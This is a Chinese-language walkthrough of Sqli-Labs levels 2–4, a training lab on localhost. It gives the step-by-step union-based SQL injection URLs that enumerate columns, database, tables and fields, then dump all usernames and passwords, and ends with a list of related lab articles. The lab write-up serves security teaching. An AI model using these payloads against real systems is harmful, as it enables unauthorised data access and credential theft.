Sqli-Labs:Less2-Less4
Less2-Less4和Less1的查詢語句類似,只是引號及括號的區別。
Less2
基於錯誤_GET_數字型注入
http://localhost:8088/sqlilabs/Less-2/?id=1http://localhost:8088/sqlilabs/Less-2/?id=1'http://localhost:8088/sqlilabs/Less-2/?id=1"
第一條正常,第二、第三條報錯:數字型注入
查詢語句:
select username,password from table_name where id=$_GET['id'] limit 0,1
http://localhost:8088/sqlilabs/Less-2/?id=1 order by 4--+
3個欄位
http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,3--+
第2、第3欄位
http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,concat_ws('-',user(),database())--+
資料庫:security
http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
表名:users
http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
欄位名:id、username、password
http://localhost:8088/sqlilabs/Less-2/?id=-1 union select 1,group_concat(username),group_concat(password) from users--+
END.
Less3
基於錯誤_GET_單引號_小括號_字元型注入
http://localhost:8088/sqlilabs/Less-3/?id=1http://localhost:8088/sqlilabs/Less-3/?id=1'http://localhost:8088/sqlilabs/Less-3/?id=1"
第一、第三條正常,第二條報錯:字元型注入
查詢語句:
select username,password from table_name where id=('$_GET['id']') limit 0,1
http://localhost:8088/sqlilabs/Less-3/?id=1') order by 4--+
3個欄位
http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,3--+
第2、第3欄位
http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,concat_ws('-',user(),database())--+
資料庫:security
http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
表名:users
http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
欄位名:id、username、password
http://localhost:8088/sqlilabs/Less-3/?id=-1') union select 1,group_concat(username),group_concat(password) from users--+
END.
Less4
基於錯誤_GET_雙引號_小括號_字元型注入
http://localhost:8088/sqlilabs/Less-4/?id=1http://localhost:8088/sqlilabs/Less-4/?id=1'http://localhost:8088/sqlilabs/Less-4/?id=1"
第一、第二條正常,第三條報錯:字元型注入
查詢語句:
select username,password from table_name where id=("$_GET['id']") limit 0,1
http://localhost:8088/sqlilabs/Less-4/?id=1") order by 4--+
3個欄位
http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,3--+
第2、第3欄位
http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,concat_ws('-',user(),database())--+
資料庫:security
http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security'--+
表名:users
http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,2,group_concat(column_name) from information_schema.columns where table_name='users' and table_schema='security'--+
欄位名:id、username、password
http://localhost:8088/sqlilabs/Less-4/?id=-1") union select 1,group_concat(username),group_concat(password) from users--+
END.
相關文章
- less-12 in sqli-labsSQL
- sqli-labs(54-65)SQL
- sqli-labs————Less-52SQL
- sqli-labs————Less-53SQL
- sqli-labs————Less-55SQL
- sqli-labs————Less-56SQL
- sqli-labs————Less-57SQL
- sqli-labs————Less-58SQL
- sqli-labs————Less-59SQL
- sqli-labs————Less-28SQL
- sqli-labs————less-28aSQL
- sqli-labs————Less-29SQL
- sqli-labs————Less-30SQL
- sqli-labs————Less-31SQL
- sqli-labs————Less-32SQL
- sqli-labs————Less-33SQL
- sqli-Labs————less-35SQL
- sqli-Labs————less-36SQL
- sqli-Labs————less-37SQL
- sqli-Labs————less-38SQL
- sqli-Labs————less-39SQL
- sqli-Labs————less-40SQL
- sqli-Labs————less-41SQL
- sqli-Labs————less-42SQL
- sqli-Labs————less-43SQL
- sqli-Labs————less-44SQL
- sqli-Labs————less-45SQL
- sqli-labs————Less-48SQL
- sqli-labs————Less-49SQL
- sqli-labs————Less-51SQL
- Sqli-labs 部落格目錄SQL
- sqli-labs————Less-60-65SQL
- sqli-labs ————less -26aSQL
- 玩一玩sqli-labs靶場SQL
- sqli-labs第二關 詳解SQL
- Sqli-labs之Less1-10SQL
- sqli-labs 第25關(過濾or和AND )SQL
- sqli-labs————Less-26(繞空格、/*、#等)SQL